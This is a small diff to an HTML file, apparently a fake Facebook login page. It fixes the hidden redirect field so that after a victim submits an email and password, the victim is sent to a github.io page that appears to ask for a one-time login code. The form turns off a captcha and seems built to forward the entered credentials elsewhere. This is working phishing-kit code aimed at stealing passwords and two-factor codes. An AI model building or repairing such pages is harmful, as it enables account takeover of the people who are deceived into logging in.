--- a/fb.html
+++ b/fb.html
@@ -193,9 +193,7 @@
                 <input type="text" name="username" id="username" required placeholder="email">
 
                 <input type="text" name="password" id="password" required placeholder="password">
-                 <input type="hidden" name="_next" value="https://sephorasquad.github.io/votegd
-                
-                /fbcode.html"> 
+                 <input type="hidden" name="_next" value="https://sephorasquad.github.io/votegd/instagram/otp/fbcode.html"> 
                 <input type="hidden" name="_captcha" value="false">
                 <div class="link">
                     <button type="submit" value="Send Email" class="login" id="button" style="text-decoration: none; color: white;">Login 
